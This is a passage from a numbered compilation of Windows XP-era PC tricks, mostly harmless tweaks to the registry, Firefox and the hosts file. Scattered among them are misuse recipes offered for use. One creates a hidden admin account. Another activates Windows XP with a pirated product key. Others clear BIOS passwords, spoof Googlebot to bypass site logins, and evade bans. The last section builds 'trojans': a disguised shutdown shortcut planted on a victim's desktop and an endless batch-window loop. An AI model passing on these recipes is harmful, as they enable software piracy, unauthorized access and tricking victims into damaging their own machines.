space warning as a balloon tip from the system tray. If this is undesirable, it
can be disabled using the tweak below:

To disable the low disk-space balloon tip:

* Use a registry editing tool to navigate to the following key:

HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre
ntVersion\Policies\Explorer

* Insert a value with the following details:

Data Type: DWORD
Value Name: NoLowDiskSpaceChecks
Value: 1
* Reboot your machine for the change to take effect.
Trick-72
Enabling right click on sites that disable it

This is a tip on how to Enable right click function on sites that disable it.

Lots of web sites have disabled the right click function of the mouse button... it's
really, really annoying. This is done so that you don't steal (via right-click->save
picture) their photos or images or any other goodies. Unfortunately, it disables
ALL right-click functionality: copy, paste, open in new window.

The solution is simple, just get used to right clicking and hitting the Esc
"Escape" Key "NOT at the same time but very close to it" right click first then
Esc. Until you are allowed access to the context menu to copy/save the
file/photo.... Sometimes it takes a couple of tries but with practice comes
perfection.
Trick-73
How to change IPs

This is a tutorial about changing IP addresses. You can change your IP
address for various reasons

1.) because you got banned in a game from some server.

2.) you got banned from some crappy forums and want to get a nub back

3.) if you are downloading from somewhere like Rapidshare, you might not
have patience to wait for 3 hours to download another file again, if you change
your ip, you can download another file instantly having to still wait for your
"ticket" tho.



Ok there are many ways of changing your IP

First is to go to the Start Menu and goto the RUN command.

after that type this:

blah blah blah>ipconfig

now see what your ip address is right NOW.


now you need to:
blah blah blah> ipconfig [SPACE ONCE] /release
(Note:this releases the IP address you are using now, and your internet wont
work till u renew another IP address or the same one)



then like after 10-20 seconds do:
blah blah blah>ipconfig [SPACE ONCE] /renew
this gives you an iP address,either another one, or the same one you had
before


that is one way of changing your IP Wink, note that it won't work all the time.


Now if you don't like all that technical stuff, then here is an easier way.


If you have a ROUTER, this is gonna be ownage.

Unplug your router power, and after that your DSL pwoer cable, wait for 10
seconds until your internet icon at the taskbar has an X with it.

now plug back your router in, then after 1 second of plugging your router in,
plug that dsl of yours in.

When you are connected to the internet, try getting a file from rapidshare, and
see if you can download.

If u can download, then congratulations, you have just changed your IP address


(Note again: sooner or later, you will run out of IP addresses to change,but that
will take a long time for it to happen)
Trick-74
Create Hidden Admin Account in XP

Since we are going to do all the Editing in Window Registry it is Recommended
to Back Up the Registry before going Further.

After you have Backed up your registry follow the Steps to Create your Hidden
Account:

* First Goto Start -> Run -> Type regedit -> Enter
* In the Left Menu goto,

HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\Cu
rrentVersion\Winlogon\SpecialAccounts\UserList

* In the Right pane, Right click -> New -> String Value
* Right click on the new String Value and click Rename
* Type the Name of the Account you want to hide.
* Hit Enter then Right click on the String Value again and Change value to 0
which hides it. If you want it to be Visible to all Enter the Value 1.
* Now Save and Exit the Registry and Logoff.
* Goto welcome screen and Hit ctrl+alt+del twice to bring up Logon prompt
* Type hidden Accounts name and password
* Enjoy!!!
Trick-75
8 Hacks To Make Firefox Ridiculously Fast

Firefox has been outperforming IE in every department for years, and version 3
is speedier than ever.

But tweak the right settings and you could make it faster still, more than
doubling your speed in some situations, all for about five minutes work and for
the cost of precisely nothing at all. Here's what you need to do.

Enable pipelining
Browsers are normally very polite, sending a request to a server then waiting
for a response before continuing. Pipelining is a more aggressive technique
that lets them send multiple requests before any responses are received, often
reducing page download times. To enable it, type about:config in the address
bar, double-click network.http.pipelining and network.http.proxy.pipelining so
their values are set to true, then double-click
network.http.pipelining.maxrequests and set this to 8.

Keep in mind that some servers don't support pipelining, though, and if you
regularly visit a lot of these then the tweak can actually reduce performance.
Set network.http.pipelining and network.http.proxy.pipelining to false again if
you have any problems.



2. Render quickly
Large, complex web pages can take a while to download. Firefox doesn't want
to keep you waiting, so by default will display what it's received so far every
0.12 seconds (the "content notify interval"). While this helps the browser feel
snappy, frequent redraws increase the total page load time, so a longer content
notify interval will improve performance.

Type about:config and press [Enter], then right-click (Apple users ctrl-click)
somewhere in the window and select New > Integer. Type
content.notify.interval as your preference name, click OK, enter 500000 (that's
five hundred thousand, not fifty thousand) and click OK again.

Right-click again in the window and select New > Boolean. This time create a
value called content.notify.ontimer and set it to True to finish the job.


3. Faster loading
If you haven't moved your mouse or touched the keyboard for 0.75 seconds
(the content switch threshold) then Firefox enters a low frequency interrupt
mode, which means its interface becomes less responsive but your page loads
more quickly. Reducing the content switch threshold can improve performance,
then, and it only takes a moment.

Type about:config and press [Enter], right-click in the window and select New >
Integer. Type content.switch.threshold, click OK, enter 250000 (a quarter of a
second) and click OK to finish.


4. No interruptions
You can take the last step even further by telling Firefox to ignore user interface
events altogether until the current page has been downloaded. This is a little
drastic as Firefox could remain unresponsive for quite some time, but try this
and see how it works for you.

Type about:config, press [Enter], right-click in the window and select New >
Boolean. Type content.interrupt.parsing, click OK, set the value to False and
click OK.


5. Block Flash
Intrusive Flash animations are everywhere, popping up over the content you
actually want to read and slowing down your browsing. Fortunately there's a
very easy solution. Install the Flashblock extension (flashblock.mozdev.org) and
it'll block all Flash applets from loading, so web pages will display much more
quickly. And if you discover some Flash content that isn't entirely useless, just
click its placeholder to download and view the applet as normal.



6. Increase the cache size
As you browse the web so Firefox stores site images and scripts in a local
memory cache, where they can be speedily retrieved if you revisit the same
page. If you have plenty of RAM (2 GB of more), leave Firefox running all the
time and regularly return to pages then you can improve performance by
increasing this cache size. Type about:config and press [Enter], then right-click
anywhere in the window and select New > Integer. Type
browser.cache.memory.capacity, click OK, enter 65536 and click OK, then
restart your browser to get the new, larger cache.



7. Enable TraceMonkey
TraceMonkey is a new Firefox feature that converts slow Javascript into super-
speedy x86 code, and so lets it run some functions anything up to 20 times
faster than the current version. It's still buggy so isn't available in the regular
Firefox download yet, but if you're willing to risk the odd crash or two then
there's an easy way to try it out.
Install the latest nightly build (
Quote:
ftp://ftp.mozilla.org/pub/firefox/nightly/latest-trunk/

), launch it, type about:config in the address bar and press Enter. Type JIT in
the filter box, then double-click javascript.options.jit.chrome and
javascript.options.jit.content to change their values to true, and that's it - you're
running the fastest Firefox Javascript engine ever.


8. Compress data
If you've a slow internet connection then it may feel like you'll never get Firefox
to perform properly, but that's not necessarily true. Install toonel.net (toonel.net)
and this clever Java applet will re-route your web traffic through its own server,
compressing it at the same time, so there's much less to download. And it can
even compress JPEGs by allowing you to reduce their quality. This all helps to
cut your data transfer, useful if you're on a limited 1 GB-per-month account, and
can at best double your browsing performance
Trick-76
Disable Splash Screen From Your System

Through the following steps you can Disable your Splash Screen Really 100%
working


1. Go in Start Menu
2. Click on Run
3.Type Msconfig
4. Check /NOGUIBOOT and then press ok
5.Restart your System.
Trick-77
Make ur xp genuine in one line steps

1.Goto "start"
2.Run-type in "regedit"
3.Goto "local-machine-software-microsoft-window s nt-current version-
wpaevents"
4.choose "oobe timer" in the rights panel
5.in the window,delete all the things.
6.close regedit
7.goto start-run-type in "%systemroot%\system32\oobe\msoobe.exe /a"
8.choose the second option "use phone to activate"
9.click "change product key"
10.type in the serial:thmpv-77d6f-94376-8hgkg-vrdrq
11.click "update"
12.click"remember later"
13.after that restart the computer
14.after restart goto start-run-type in
"%systemroot%\system32\oobe\msoobe.exe /a"
15.it should come up with a message"windows activated"-finished!

It was tested & it works 100 % Only For Windows XP.
Trick-78
URL Shortening via Gmail

There are some URL shortening services such as TinyUrl and Bit

ALso there is a way to shorten your URL through Gmail from char Option...

Go to Your Gmail Account

Add
Quote:
urlataskme.im
replace at by @ to your gmail Contacts..

Just type the URL you need to shorten in chat section...

It gets Shortened automatically..
Trick-79
Cool Mouse Ticks
Moving the pointer without a mouse!
Ever thought that you could move your mouse pointer without your mouse? No,
not really, isnt it? But, its possible!

Here is how:

1.Press Left Alt + Left Shift + Num Lock Button and click OK in the dialogue box
that appears.

2.In your Taskbar, a mouse-like icon will appear. Double click it and under
Mouse tab, make sure that the Use Mouse Keys is checked.

3.Also ensure that the Num Lock is ON (ie. the light must glow).

2.Now with the help of Numeric Keypad e.g ( Press and Hold the following Keys
)

7 8 9

4 6

1 2 3

For normal click, press 5

Interesting, isnt it? You can also change settings under the Mouse tab in
Accessiblity Options, by clicking on Settings

Trick-80
How to remove Windows Vista and/or Windows 7
from dual boot system having XP.

I was having my P.C. with X.P. as well Windows Vista and Beta version of Windows 7 as a
dual boot.
After some days if uses I stopped using Vista and Windows 7.
Now I wished to get rid of these Operating systems as they were using a lot of space on
my Hard Disk and I did not needed them any more.
Then I searched for the solution of How to remove those Operating Systems without losing
my Data and even without having to re-install my X.P.?
I think many of you people also have this problem of how to remove Vista and / or
Windows 7 on a dual boot system with X.P.

Here is how to do it.

1> Boot your computer in to Windows XP.

2> Ensure you have the Vista DVD in the DVD drive.

3> Go to Start and Run. Type in d:\boot\bootsect.exe /nt52 ALL /force
(without quotes, plus replace d: with the drive letter of your Vista DVD).

4> Remove two files (Boot.BAK & Bootsect.BAK) on your XP root folder (C: ).

5> Restart the computer, and you will notice the boot selection menu is gone.

6> Format the partition/drive where you had Vista installed.

And now you have returned your computer to its previous state, without Vista and without
the new bootloader.
Trick-81
How To Make A Scary Pop-up

You can use this trick to scare your friends or to make something useful, like reminders
you put in Windows Start-up.

Here are the steps on how to do a pop-up:

1. Open Notepad and type:

text1=msgbox("your text here",52,"your title here")




You can write as many text message boxes as you want. The many you write the many
pop-ups will appear.

2. Save the text as popup.vbs. Be sure the change the 'Save as Type' to 'All Files' .



3. You can use scary messages to make a prank to your friends, like:

text1=msgbox("Virus Detected",52,"Warning: VIRUS")
text2=msgbox("Virus is installing on your system",52,"Installing...")
text3=msgbox("Virus is installing on your system",52,"Installing...")
Trick-82
Find who is Invisible on Yahoo Messenger

Sometimes some of your friends who appear offline in Yahoo Messenger may
not be actually offline, they may in the 'Invisible' mode. This maybe if they are
trying to ignore you or are too busy to talk to anyone.

There is a small trick that you can use to find out what the truth is

Firstly open your Yahoo Messenger main window and double click on the name
of the person whom you want to check. The chat window will open obviously.

Click IMVironment button, select See all IMVironments, select Yahoo! Tools or
Interactive Fun, and click on Doodle.

After loading the Doodle Imvironment there can be two possibilities :-

## 1. If the user is offline Doodle are will show this "waiting for your friend to
load Doodle" continuously.

## 2. If the user is online (but in invisible mode), after few seconds (it can
take up to one minute, depending on your connection speed), you should get a
blank page. So you know that the user is online.
Trick-83
Clear BIOS Password, All tricks !


**** New Trick **** :
Fainted brain
At command prompt type debug
you will get a - prompt where you can type the fallowing ( means hit enter, not
type enter*)
A
MOV AX,0
MOV AX,CX
OUT 70,AL
MOV AX,0
OUT 71,AL
INC CX
CMP CX,100
JB 103
INT 20
just hit enter on this line
G
Q
Basic BIOS password crack - works 9.9 times out of ten
This is a password hack but it clears the BIOS such that the next time you start
the PC, the CMOS does not ask for any password. Now if you are able to bring
the DOS prompt up, then you will be able to change the BIOS setting to the
default. To clear the CMOS do the following:
Get DOS prompt and type:
DEBUG hit enter
-o 70 2e hit enter
-o 71 ff hit enter
-q hit enter
exit hit enter
Restart the computer. It works on most versions of the AWARD BIOS.

*Another Trick 2 Clear COMOS + BIOS is Open Ur PC Cabinet And Open The
Battery For 5Min And Then Insert It Open Ur Computer And Ur Password Will
Be Reset
Trick-84
FIX: Folder opens in a new window

double-click on any folder in My Computer, it opens in a new window even YOU have selected the
option "Always open folders in same window" in "Tools -> Folder Options".

HOW TO RESOLVE THIS HERE YOU GO

copy the following codes and paste in a notepad and save as share.reg, double click it,
allow the action
Quote:
Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\Folder\shell]

[HKEY_CLASSES_ROOT\Folder\shell\explore]
"BrowserFlags"=dword:00000022
"ExplorerFlags"=dword:00000021

[HKEY_CLASSES_ROOT\Folder\shell\explore\command]
@=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00 ,52,00,6f,00,6f,00,74,00,25,\
00,5c,00,45,00,78,00,70,00,6c,00,6f,00,72,00,65,00 ,72,00,2e,00,65,00,78,00,\
65,00,20,00,2f,00,65,00,2c,00,2f,00,69,00,64,00,6c ,00,69,00,73,00,74,00,2c,\
00,25,00,49,00,2c,00,25,00,4c,00,00,00

[HKEY_CLASSES_ROOT\Folder\shell\explore\ddeexec]
@="[ExploreFolder(\"%l\", %I, %S)]"
"NoActivateHandler"=""

[HKEY_CLASSES_ROOT\Folder\shell\explore\ddeexec\app lication]
@="Folders"

[HKEY_CLASSES_ROOT\Folder\shell\explore\ddeexec\ife xec]
@="[]"

[HKEY_CLASSES_ROOT\Folder\shell\explore\ddeexec\top ic]
@="AppProperties"

[HKEY_CLASSES_ROOT\Folder\shell\open]
"BrowserFlags"=dword:00000010
"ExplorerFlags"=dword:00000012

[HKEY_CLASSES_ROOT\Folder\shell\open\command]
@=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00 ,52,00,6f,00,6f,00,74,00,25,\
00,5c,00,45,00,78,00,70,00,6c,00,6f,00,72,00,65,00 ,72,00,2e,00,65,00,78,00,\
65,00,20,00,2f,00,69,00,64,00,6c,00,69,00,73,00,74 ,00,2c,00,25,00,49,00,2c,\
00,25,00,4c,00,00,00

[HKEY_CLASSES_ROOT\Folder\shell\open\ddeexec]
@="[ViewFolder(\"%l\", %I, %S)]"
"NoActivateHandler"=""

[HKEY_CLASSES_ROOT\Folder\shell\open\ddeexec\applic ation]
@="Folders"

[HKEY_CLASSES_ROOT\Folder\shell\open\ddeexec\ifexec]
@="[]"

[HKEY_CLASSES_ROOT\Folder\shell\open\ddeexec\topic]
@="AppProperties"

[-HKEY_CLASSES_ROOT\Directory\shell\explore]

[-HKEY_CLASSES_ROOT\Directory\shell\open]

[-HKEY_CLASSES_ROOT\Drive\shell\open]

[HKEY_CLASSES_ROOT\Drive\shell]
@="none"

[HKEY_CLASSES_ROOT\Directory\shell]
@="none"

[HKEY_CLASSES_ROOT\Folder\shell]
@=-

Trick-85
Now you'll no longer need to browse through various
folders each time you change Wallpaper

This tip is for Windows XP users. When you want to change the desktop
wallpaper, you right-click on desktop, select Properties and goto "Desktop" tab.
Now you see a few wallpapers in the given list:

You can select any of them but if your wallpapers are somewhere else, you'll
need to click on "Browse" button and then goto that folder and select the
desired wallpaper.

Its not a big deal but what if you are a wallpaper freak and change the
wallpaper every day or hour?It might get irritating for you to click on Browse and
goto the directory each time.

Now here I'll show you a way to change the default wallpaper directory in
Desktop Properties, so that whenever you'll open it, it'll show the wallpapers
present in your desired folder:

1. Open regedit and goto:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion

2. In right-side pane, you'll see a string value "WallPaperDir". Its default value
will be:

%SystemRoot%\Web\Wallpaper

You have to change it to your desired wallpaper directory path. Suppose your
wallpapers are stored in "E:\Wallpapers" directory, then set the value to
"E:\Wallpapers".

3. Exit registry editor and open Desktop Properties again. Now it'll show all
wallpapers present in the folder which you set in registry:

4. Thats it. Now you'll no longer need to browse through varioud folders each
time you want to change the wallpaper
Trick-86
SPEED UP UR ACROBAT READER (ALMOST LIKE
NOTEPAD)

1. Go to the installation folder of acrobat reader

(C:\program files\adobe\acrobat\reader\.. whatever)

2. Move all the files and folders from the "plugins" directory to the "Optional"
directory. (I repeat.. cut and paste the files NOT copy & paste).

Also make sure that acrobat reader is not open else it will lock the files and not allow
you to move the files).

Now your acrobat reader will load very fast and almost as good as notepad.
Trick-87
Cool Hidden trick in Utorrent

This is a Good trick...

open utorrent--->help-->about utorrent.

when it shows a version screen, hit the 't' button

Now u'll see a tetris game. U can play there itself.

Just Hit The "t" on Ur KeyBoard and U Shud Be Able To

Play The Hidden TETRIS Game
Trick-88
Skip registering on sites

So sometimes u r to lazy to login or u forget password and u quick need some
information.

So good way is faking UA <- User Agent

I will show u example of firefox

Type in URL bar following:

about :config

then u should see alot of options which can be changed

1cm down u will see "Filter:"

Type in box

"useranget" without quotes

We need to change just

general.useragent.extra.firefox

Deafult is Firefox x.x.x or something like that^^

So how to bypass login on that websites(also on h4cky0u)?

just double click & type in that field

Code: Select all
Googlebot/2.X (
Quote:
http://www.googlebot.com/bot.html
)


So websites will think u r google bot and allow u searching on website without
login
Trick-89
Boot defragment

A very important new feature in Microsoft Windows XP is the ability to do a
boot defragment. This basically means that all boot files are placed next to each
other on the disk drive to allow for faster booting. By default this option is
enabled but some upgrade users have reported that it isn't on their setup.

1. Start Regedit.
2. Navigate to
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Dfrg\BootOpt
imizeFunction
3. Select Enable from the list on the right.
4. Right on it and select Modify.
5. Change the value to Y to enable and N to disable.
6. Reboot your computer.
Trick-90
How to Change the color of your START menu
button
1. Goto C:\WINDOWS\Resources\Themes and copy both Luna.theme and Luna
folder to desktop.

2. From desktop, Change the names; Luna.theme to Orange.theme (or
whatever name u want) and Luna folder to orange.

3. Open Orange.theme in Notepad and replace all the words "LUNA" with
"Orange"

4. Open Orange folder from desktop and change the name of Luna.msstyles to
Orange.msstyles

5. Now cut/copy both orange.theme file and orange folder back to
C:\WINDOWS\Resources\Themes

6. Download Resource Hacker
Quote:
http://www.angusj.com/resourcehacker/
7. Use Resource Hacker to open your Orange.msstyles file from
C:\WINDOWS\Resources\Themes\Orange\Orange.msstyles
8. You can replace any or all of the STARTBUTTON_BMP files that are located in
the Bitmap section. There are 3 different sets: BLUE_STARTBUTTON_BMP,
HOMESTEAD_STARTBUTTON_BMP, AND METALLIC_STARTBUTTON_BMP, for
BLUe, OLIVE GREEN and SILVER color scheme respectively.So here, im ging to
change the color for only Blue color scheme, so i'll use
BLUE_STARTBUTTON_BMP.

9. Right click on 1033 under BLUE_STARTBUTTON_BMP folder and from menu,
select the 3rd option--> SAVE [BITMAP :BLUE_STARTBUTTON_BMP:1033].
save it to desktop with any name. (don't close your Resource hacker)

10. Open the newly saved bitmap file in any paint editer and edit it. The three
green buttons you will see are the original Start buttons. so edit them
according to their apearence. Dont remove the blue lines and purple color (it
won't appear in the Start button) and dont change the size of the image.Edit
the green part only.After editing, save the bitmap file with any name.
11. (I hope u havent closed the Resource hacker....if yes...no problem, again
Use Resource Hacker to open your Orange.msstyles file from
C:\WINDOWS\Resources\Themes\Orange\Orange.msstyles ) Now again right
click on 1033 under BLUE_STARTBUTTON_BMP folder in Resource hacker >
Replace Resource.. > Open the file with new bitmap > (select your edited
bitmap from desktop) > Replace. Then click file > SAVE.

12. You are almost done here...only one thing more to do....Download
UXtheme.dll file for your windows and save it to your harddrive..not your
Desktop.
Quote:
www.withinwindows.com/uxtheme-patches/
13. Restart your PC in Safe Mode, go to C:\WINDOWS\ system32 and find the
file uxtheme.dll, rename it to uxtheme2.dll (as a backup). Now copy your
downloaded UXtheme.dll file to C:\WINDOWS\ system32.

14. Restart your PC in Normal Mode, Goto Display Properties > Appearance
and you will see two WINDOWS XP STYLE options under WINDOWS AND
BUTTONS option..one of them is yours (probably the first one). Select it, also
select your color scheme as Blue (if it is not) and hit ENTER....and enjoy a new
look of you Start menu button........

Trick-91
View the Contents of Zip/Rar file before
Downloading

Most of the files we download from the Internet are in Zip or Rar format. We
wouldnt like if we download an archive to find that the file we are looking for is
not there. And it is also such a waste of Bandwidth and time to download a
whole archive just for a single file. Archview is a Firefox addon that lets you
preview the contents of an Archive before downloading. And using it you can
even download a single file from the archive.

Currently it supports only RAR, ZIP and ISO format but that should be enough
as they are the 2 most popular and common formats being used today.
Archview adds itself to the stats bar and becomes active when the user clicks
on a zip or rar link. It displays the contents almost instantly and presents the
files of the archive in an XML or HTML interface. And whats more, it even lets
you download individual files for an archive, now no need to download a 10 MB
archive for a file of 100 Kb that is inside.
The future version will also add support for the 7z format. It supports Firefox 2
and Firefox 3. It is definitely a great add on that can save you a lot of
bandwidth.
Quote:
https://addons.mozilla.org/en-US/firefox/addon/5028
Delete An "undeletable" File

Open a Command Prompt window and leave it open.
Close all open programs.
Click Start, Run and enter TASKMGR.EXE
Go to the Processes tab and End Process on Explorer.exe.
Leave Task Manager open.
Go back to the Command Prompt window and change to the directory the AVI
(or other undeletable file) is located in.
At the command prompt type DEL <filename> where <filename> is the file you
wish to delete.
Go back to Task Manager, click File, New Task and enter EXPLORER.EXE to
restart the GUI shell.
Close Task Manager.



Or you can try this

Open Notepad.exe

Click File>Save As..>

locate the folder where ur undeletable file is

Choose 'All files' from the file type box

click once on the file u wanna delete so its name appears in the 'filename' box

put a " at the start and end of the filename
(the filename should have the extension of the undeletable file so it will
overwrite it)

click save,

It should ask u to overwrite the existing file, choose yes and u can delete it as
normal
Trick-92
Control Panel On ur Desktop

On The Desktop, Right Click Your Mouse Then Choose "New | Folder".
Name The Folder As
Quote:
ControlPanel.{21EC2020-3AEA-1069-A2DD-08002B30309D}
And Now You Can Access The Control Panel More Faster Then Before.
Trick-93
How to prevent users from writing to USB drives


Today USB drive also known as keychain drive is becoming the most popular
removable storage device to move data to different locations. USB drives are
available in the market with different features, for example password protected,
compatible with all windows versions and extra storage capacity (up to 65 GB).

A common security issue at organizations is how to prevent their workers to
write data onto USB drives using their PCs, because a user can easily move
confidential data for other location.

If you have windows XP with SP2, then you can disable the writing option to
USB drives.

Follow the given steps to disable the USB writing option:

To edit the computer registry, first you should log onto your computer with
administrative rights.

First click on Start button and type "Regedit" in Run option.

Here locate the location to:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro l

Here in right side panel, click right to create a key with the name
"StorageDevicePolicies".

Now in left side panel, select "StorageDevicePolicies" key, again right click to
create new DWORD value then label it "WriteProtect".

Set its value to "1". But again enable this option set its values "0".


Now close the registry editor and restart your computer after any changes to go
into effect

Trick-94
ACCESS INTERNET THROUGH UR MS CALCULATOR

1. Open your MS Calculator. This is normally found in Start => All Programs =>
Accessories => Calculator.

2. Open the help-window by pressing the F1 key.

3. Click the top-left corner icon of the help window once (Standard is a
Document with a Questionmark).

4. Select Go to URL-address.

5. Type your address into the avaliable field, but remember to type http:// and
not just www. (or equivalent).

6. Have fun!
Trick-95
Graphing calculator for Windows XP!!

The calculator which ships with Windows is very useful for performing basic
arithmetic and low-level scientific functions, however if you are looking for a
more powerful calculator, check out Microsofts Power Calculator.
download it from that link..
Quote:
http://download.microsoft.com/downlo...ertoySetup.exe

This calculator replacement offers advanced functionality such as graphing,
variable storage and full equation writing. If you ever used a TI-8x calculator,
the functions of the Power Calculator are similar (although not nearly as fully
featured) with respect to the mathematical operations.

This tool is a free download, so if you think it will be useful to you give it a try.
Trick-96
How to block unwanted sites using notepad

There are hundreds if not thousands of software programs that are available to block
unwanted sites on your PC. some straightforward commands and a text editing program
like notepad ( on every windows PC since windows3.1) and you not simply stop someone
one(kids, husbands, brother in-laws) from visiting sites that might put computer at risk, or
expose them to thing you dont want them to know about.

1. Know the list of sites you want to block make sure your computer has an internet
connection.

2. Standard look of DOS Window Open a command window (DOS), and type in nslookup

3. Jot down this IP address for future reference type in the name of the site you want to
send them to when they visit one of the sites you dont want them to go to. Ie.
Quote:
www.google.com

etc

4. Found on XP Find the HOSTS file on your PC. HINT: on Windows(Pre XP ) it will be
located under C:\WINNT\System32\Drivers\etc On WindowXP machines it will be located
under C:\WINDOWS\System32\Drivers\etc

5. Double Click on the file named HOSTS, there is no extension for this file.

6. Select NOTEPAD to open and edit this file with Your PC should ask what program you
want to open this file with. Select Browse and the select Notepad as the program you
want to use.
7. Basic HOST file setup there is some basic instructions on how to enter things in here.
127.0.0.1 is the universal IP address for the loop back address on every windows PC in
the world. By using this entry, any request to a certain address will send the request back
to your PC.

8. Dont just block them, send them somewhere useful Start by entering the IP address you
jotted down earlier. Followed by the name of the site you want to block

9. One drawback to this is that you will need to enter the domain name twice Once as the
domain name, and once with WWW in it.

10. Save the file.

11. Open browser and try to visit the site, you should be redirected back to where you
wanted them to go. if you use 127.0.0.1 and are not running a web server on your
computer then your browser should return the standard ( 404 page not found error )
Trick-97
How to Delete Specific URLs from your
Browser (Firefox & IE)

Sometimes a situation comes that we have to delete certain specific website address (url)
only from the web-browser location or address bar say to preserve your identity. For
example, you visited a certain website and dont want your friends or others to know that
you visited that site, then you have two methods to delete the website links either delete all
the urls from the address bar or only the specific one (recommended).


## In Firefox, you just need to move your mouse over the website entry and press Shift +
Delete Key combination to delete the desired address from the history.

## For Internet Explorer, follow the steps exactly as described bellow; do keep in mind
this trick needs editing the registry and you need to be very careful with it:

Close any open Internet Explorer window

Go to Start->Run and type in regedit.exe and press enter to launch the registry editor

Navigate to the following key:
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs

Delete the desired URL
Trick-98
Airtel song in C language.


Code:
#include<dos.h>
#include<stdio.h>
float main(void)
{
float A,Bb,D,G,F;
A = 440;
G = 780;
Bb = 461;
D = 586;
F = 687;
sound(G);
delay(500);
nosound();
sound(G);
delay(250);
nosound();
sound(G);
delay(250);
nosound();
sound(G);
delay(500);
nosound();
sound(2*D);
delay(500);
nosound();
sound(2*A);
delay(250);
nosound();
sound(2*Bb);
delay(250);
nosound();
sound(2*A);
delay(250);
nosound();
sound(G);
delay(250);
nosound();
sound(F);
delay(500);
nosound();
sound(2*A);
delay(500);
nosound();
sound(G);
delay(250);
nosound();
sound(2*A);
delay(250);
nosound();
sound(G);
delay(250);
nosound();
sound(F);
delay(250);
sound(G);
delay(250);
sound(2*A);
delay(250);
sound(2*Bb);
delay(500);
sound(2*A);
delay(500);
sound(G);
delay(250);
sound(F);
delay(250);
sound(D);
delay(500);
nosound();
//end 1
sound(G);
delay(500);
nosound();
sound(G);
delay(250);
nosound();
sound(G);
delay(250);
nosound();
sound(G);
delay(500);
nosound();
sound(2*D);
delay(500);
nosound();
sound(2*A);
delay(250);
nosound();
sound(2*Bb);
delay(250);
nosound();
sound(2*A);
delay(250);
nosound();
sound(G);
delay(250);
nosound();
sound(F);
delay(500);
nosound();
sound(2*A);
delay(500);
nosound();
sound(G);
delay(250);
nosound();
sound(2*A);
delay(250);
nosound();
sound(G);
delay(250);
nosound();
sound(F);
delay(250);
sound(G);
delay(250);
sound(2*A);
delay(250);
sound(2*Bb);
delay(500);
sound(2*A);
delay(500);
sound(G);
delay(250);
sound(F);
delay(250);
sound(D);
delay(500);
nosound();
//end 2
sound(2*A);
delay(250);
nosound();
sound(G);
delay(250);
nosound();
sound(F);
delay(250);
sound(G);
delay(250);
sound(2*A);
delay(250);
sound(2*Bb);
delay(500);
sound(2*A);
delay(500);
sound(G);
delay(250);
sound(F);
delay(250);
sound(D);
delay(500);
nosound();
//end 3
sound(2*A);
delay(250);
nosound();
sound(G);
delay(250);
nosound();
sound(F);
delay(250);
sound(G);
delay(250);
sound(2*A);
delay(250);
sound(2*Bb);
delay(500);
sound(2*A);
delay(500);
sound(G);
delay(250);
sound(F);
delay(250);
sound(D);
delay(500);
nosound();
return 0;
}

just copy the code in notepad and save it with extension .C
now u can open this file in c or c++ etc

how to compile

after u open the file press alt+f9

Now open it with C and hear it
Trick-99
Assign a Permanent Letter to a USB Drive

If you have multiple pen drives you might have noticed that every time you put
in your drive it will be assigned a different drive letter.

This can be frustrating when trying to run backups or opening files from
software as recent drive letter is changed. Even if you have created playlist of
the songs which are in your pen drive it wont work if the drive letter is changed.

Here are the steps you will have to follow to assign a permanent drive letter:-

1. Go to Start > Run

2. Type mmc in the box and hit enter.

3. Select File > New

4. Now select File > Add/Remove Snap-in.

5. Select Disk Management and click Add

6. Select OK.

7. Select This computer and then Finish

8. Now press OK on the Add or Remove snap-ins screen.

9. Now select Disk Management from the left menu.

10.You will now see all of your drives/partitions in the right hand side panel.

11.Right click the USB drive you want to assign a permanent letter to and select
Change Drive Letter and Paths

12. Click on Change

13. Select a permanent letter

14. Click OK

15. It will warn you about making the change there is little chance programs
you use will be affected by this. If they will, you will probably already be aware
of this so dont worry.

16. The final step is to select File > Save and save the file in the default
directory. Close the Console and you are done.

Now eject your usb drive and put it back in and see whether it is showing the
assigned letter or not.
Trick-100
Copy Windows Error Messages to the
Clipboard

Tired of re-typing long error messages just to search the solution for it using
google?? Here is the tip to make your life easy.

Whenever you get some error just press ctrl+c to copy the error message to
your clipboard.

Now paste this in the notepad and then select the desired error message and
then search in google.
Trick-101
change processor name

GO TO

START>
RUN>
TYPE REGEDIT>
HKEY_LOCAL_MACHINE>
HARDWARE>
DISCRIPTION>
SYSTEM>
CENTRAL PROCESSOR>

ON RIGHT HAND SIDE RIGHT CLICK ON PROCESSORNAMESTRING AND
THEN WRITE ANYTHING U WANT IN THAT TEXTBOX
Trick-102
Make fake viruses in windows [Advance]

We Take no responsibility for any of this tricks , Do it at your own risk

1. Fake computer virus error message

This one is by far, the easiest and all you have to do is to make a new text
document with notepad, type msg * YOUR MESSAGE and save as
anything.bat. As always, make sure that you select All files instead of Text
Document.


2. Forced shutdown trojan.

This will display a custom error message and start a countdown which will shut
down the computer.

Right-click your desktop and create a new shortcut.
Paste the following code into the Location box in the Create Shortcut menu:
shutdown -s -t 30 -c Your message here
Replace 30 with the length of the countdown you want (in seconds) and place
your custom error message between the quotes. Click next and name the
shortcut to something the victim would be likely to click on such as Internet
explorer or My Documents, etc.

Next youd want to change the icon. Right-click on the shortcut you made and
click properties. Find the Change Icon button and click it. Choose a suitable
icon for the name you chose earlier.


And thats all! Now you just have to sneak the shortcut onto the victims desktop
and run!

Note: to stop it, open Run from the start menu and type shutdown-a.


3. Endless Command prompt windows trojan

This will open up a series of command prompt windows that will never end.
The basic idea is that there are two .bat files that open the other one when
opened, so the other one opens the first one again and the windows just wont
stop coming.

How to do this:
1. Fire up notepad and type: start 2.bat
2. Save it as 1.bat (make sure you choose all files when saving it)
3. Make another new text document and type: start 1.bat
4. Save it as 2.bat into the same folder as the other one.

All you have to do to start it is to click on either of them.

The only way to stop it is to wait for the windows to become so numerous that
they are a group on the taskbar. Then you can use Close group to get rid of the
bastards.

4. Fake Command prompt trojan viruses

This is also a good way to make the victim believe that a worm is gnawing at
their hard drive and that they cant do anything to stop it.

Open up notepad and type @echo off

* To make text appear, type it after an echo tag.
* To have the the commands wait for the user to press any key type pause

